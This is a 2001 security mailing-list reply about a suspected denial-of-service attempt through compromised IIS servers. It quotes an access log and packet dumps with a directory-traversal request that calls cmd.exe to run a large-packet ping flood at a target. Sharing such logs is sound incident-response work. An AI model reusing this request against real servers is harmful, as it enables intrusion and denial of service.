Security Incidents mailing list archives

Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool

From: Blake Frantz <blake () mc net>
Date: Tue, 7 Aug 2001 18:32:54 -0500 (CDT)


This attack appears to be more related to MS01-026 than Code Red.

-Blake

On Tue, 7 Aug 2001, Eyes to the Skies. wrote:

Okay this is scary.

This looks like an attempt to use a CodeRed II infected system to
perform a denial of service attack. I don't think I need to stress the
severity of this.

==> /var/log/apache/access_log <==
[deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted
target ip]+"-n"+7000+"-w"+0" 404 -

TCPDUMP: ( i have only removed the source, since editing out the target
ip would bork the dump...)

17:19:34.539092 xxx.xxx.xxx.3385 > tnt1a-31.flint.corecomm.net.ww
w: P [bad tcp cksum 6ca7!] 792933628:792933745(117) ack 3456715952 win
16616 (DF
) (ttl 110, id 7881, len 157)
0x0000   4500 009d 1ec9 4000 6e06 f3dd d519 f9a4        E.....@.n.......
0x0010   d8d6 521f 0d39 0050 2f43 34fc ce09 4cb0        ..R..9.P/C4...L.
0x0020   5018 40e8 4446 0000 4745 5420 2f73 6372        P. ()  DF  GET./scr
0x0030   6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f        ipts/..../winnt/
0x0040   7379 7374 656d 3332 2f63 6d64 2e65 7865        system32/cmd.exe
0x0050   3f2f 632b 7069 6e67 2e65 7865 2b22 2d76        ?/c+ping.exe+"-v
0x0060   222b 6967 6d70 2b22 2d74 222b 222d 6c22        "+igmp+"-t"+"-l"
0x0070   2b36 3530 3030 2b32 3133 2e32 352e 3933        +65000+213.25.93
0x0080   2e31 3230 2b22 2d6e 222b 3730 3030 2b22        .120+"-n"+7000+"
0x0090   2d77 222b 300d 0a0d 0a2b 300d 0a               -w"+0....+0..
17:19:34.539626 unknown ip 0
0x0000   0000 0000 4510 009d 0000 0000 ff06 c196        ....E...........
0x0010   d519 f9a4 d8d6 521f 0d39 0050 fc34 432f        ......R..9.P.4C/
0x0020   fc34 432f 5018 0860 7cff 0000 4745 5420        .4C/P..`|...GET.
0x0030   2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769        /scripts/..../wi
0x0040   6e6e 742f 7379 7374 656d 3332 2f63 6d64        nnt/system32/cmd
0x0050   2e65 7865 3f2f 632b 7069 6e67 2e65 7865        .exe?/c+ping.exe
0x0060   2b22 2d76 222b 6967 6d70 2b22 2d74 222b        +"-v"+igmp+"-t"+
0x0070   222d 6c22 2b36 3530 3030 2b32 3133 2e32        "-l"+65000+213.2
0x0080   352e 3933 2e31 3230 2b22 2d6e 222b 3730        5.93.120+"-n"+70
0x0090   3030 2b22 2d77 222b 300d 0a0d 0a2b 300d        00+"-w"+0....+0.
0x00a0   0a                                             .

17:20:13.919075 xxx.xxx.xxx.xxx.4229 > tnt1a-31.flint.corecomm.net.ww
w: P [bad tcp cksum 6ca7!] 841644777:841644894(117) ack 3492756124 win
16616 (DF
) (ttl 110, id 11022, len 157)
0x0000   4500 009d 2b0e 4000 6e06 e798 d519 f9a4        E...+.@.n.......
0x0010   d8d6 521f 1085 0050 322a 7ae9 d02f 3a9c        ..R....P2*z../:.
0x0020   5018 40e8 0814 0000 4745 5420 2f73 6372        P. ()      GET./scr
0x0030   6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f        ipts/..../winnt/
0x0040   7379 7374 656d 3332 2f63 6d64 2e65 7865        system32/cmd.exe
0x0050   3f2f 632b 7069 6e67 2e65 7865 2b22 2d76        ?/c+ping.exe+"-v
0x0060   222b 6967 6d70 2b22 2d74 222b 222d 6c22        "+igmp+"-t"+"-l"
0x0070   2b36 3530 3030 2b32 3133 2e32 352e 3933        +65000+213.25.93
0x0080   2e31 3230 2b22 2d6e 222b 3730 3030 2b22        .120+"-n"+7000+"
0x0090   2d77 222b 300d 0a0d 0a2b 300d 0a               -w"+0....+0..

17:20:13.919639 unknown ip 0
0x0000   0000 0000 4510 009d 0000 0000 ff06 0000        ....E...........
0x0010   d519 f9a4 d8d6 521f 1085 0050 e97a 2a32        ......R....P.z*2
0x0020   e97a 2a32 5018 0860 5422 0000 4745 5420        .z*2P..`T"..GET.
0x0030   2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769        /scripts/..../wi
0x0040   6e6e 742f 7379 7374 656d 3332 2f63 6d64        nnt/system32/cmd
0x0050   2e65 7865 3f2f 632b 7069 6e67 2e65 7865        .exe?/c+ping.exe
0x0060   2b22 2d76 222b 6967 6d70 2b22 2d74 222b        +"-v"+igmp+"-t"+
0x0070   222d 6c22 2b36 3530 3030 2b32 3133 2e32        "-l"+65000+213.2
0x0080   352e 3933 2e31 3230 2b22 2d6e 222b 3730        5.93.120+"-n"+70
0x0090   3030 2b22 2d77 222b 300d 0a0d 0a2b 300d        00+"-w"+0....+0.
0x00a0   0a                                             .


As an afterthought, I saw a url driting around, realated to such an
idea. http://www.iispacket.com/ , although I am not getting that host to
respond.

I thinks this needs immediate attention. I can't do it now, i must go to
school.
-- 

 http://c64.arcsnet.net/
 ICQ UIN 1551505
 "The things you own, they end up owning you." - Tylder Durden

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool Eyes to the Skies. (Aug 07)
- Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool Blake Frantz (Aug 07)
- Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool Ryan Russell (Aug 08)
  - "Power" bot (was Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool) Dave Dittrich (Aug 09)